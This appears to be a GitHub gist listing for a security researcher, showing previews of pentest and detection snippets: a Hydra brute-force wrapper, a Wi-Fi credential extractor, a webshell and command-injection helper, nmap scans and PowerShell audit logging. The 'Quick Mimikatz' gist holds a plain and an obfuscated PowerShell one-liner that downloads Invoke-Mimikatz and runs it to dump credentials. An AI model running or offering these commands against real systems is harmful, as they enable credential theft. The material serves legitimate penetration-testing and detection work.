Skip to content

Instantly share code, notes, and snippets.

Greg Foss gfoss

Block or report user

Report or block gfoss

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gfoss
gfoss / auto-hydra.sh
Created Aug 3, 2017
Simple Masscan + Hydra wrapper used to perform automated scans by group (organization, unit, team, etc) and generate a report on the results.
View auto-hydra.sh
#!/bin/bash
#
# @heinzarelli
# greg . foss [at] logrhythm . com
# v0.1 - May 2017
#
function usage {
echo ""
@gfoss
gfoss / Extract-WiFi-Creds.ps1
Last active May 2, 2019
Simple script to extract locally-stored Wi-Fi Credentials
View Extract-WiFi-Creds.ps1
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#
@gfoss
gfoss / say.ps1
Created May 25, 2017
PowerShell Say
View say.ps1
function say {
param( [string]$comment = $_ )
[Reflection.Assembly]::LoadWithPartialName('System.Speech') | Out-Null
$object = New-Object System.Speech.Synthesis.SpeechSynthesizer
$object.SelectVoiceByHints('Female')
$object.Speak("$comment")
}
@gfoss
gfoss / Quick-Mimikatz
Last active Jul 15, 2019
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/7a39a55f127b1aeb951b3d9d80c6dc64500cacb5/data/module_source/credentials/Invoke-Mimikatz.ps1"); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvAEUAbQBwAGkAcgBlAC8ANwBhADMAOQBhADUANQBmADEAMgA3AGIAMQBhAGUAYgA5ADUAMQBiADMAZAA5AGQAOAAwAGMANgBkAGMANgA0ADUAMAAwAGMAYQBjAGIANQAvAGQAYQB0AGEALwBtAG8AZAB1AGwAZQBfAHMAbwB1AHIAYwBlAC8AYwByAGUAZABlAG4AdABpAGEAbABzAC8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALgBwAHMAMQAiACkAOwAgACQAbQAgAD0AIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAa
@gfoss
gfoss / PowerShell Command Line Logging
Last active Jun 11, 2019
Detect and alert on nefarious PowerShell command line activity
View PowerShell Command Line Logging
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
View gist:70ae3df90c5a532baaf7
### Keybase proof
I hereby claim:
* I am gfoss on github.
* I am heinzarelli (https://keybase.io/heinzarelli) on keybase.
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E
To claim this, I am signing this object:
@gfoss
gfoss / command injector
Created Sep 10, 2014
script to assist in exploiting command injection vulns / interacting with simple webshells
View command injector
#!/bin/bash
#
# Command Injector v0.1
# greg.foss[at]owasp.org
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html
function usage {
echo "usage: -u URL"
echo "eg : -u \"http://site.com/index.php?cmd=\""
@gfoss
gfoss / autopeep.sh
Last active Jul 20, 2016
Simple script used to set peepingtom.py to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
View autopeep.sh
#!/bin/bash
#
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]owasp.org
#
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh
# prepare storage location, remove old data, and migrate existing folders
@gfoss
gfoss / nmap-os-detection
Created Aug 28, 2013
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
View nmap-os-detection
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"
@gfoss
gfoss / ssh-attempts.txt
Last active Dec 30, 2018
grep IP addresses from auth logs to see attempted ssh attempts into your box w/ invalid creds {ubuntu}
View ssh-attempts.txt
#search for invalid logon attempts, pull out IP, remove dupes, sort...
$ grep -rhi 'invalid' /var/log/auth.log* | awk '{print $10}' | uniq | sort > ~/ips.txt
#look em up
$ for i in `cat ~/ips.txt`; do @nslookup $i 2>/dev/null | grep Name | tail -n 1 | cut -d " " -f 3; done > ~/who.txt
# :-) #
$ do moar things...
You can’t perform that action at this time.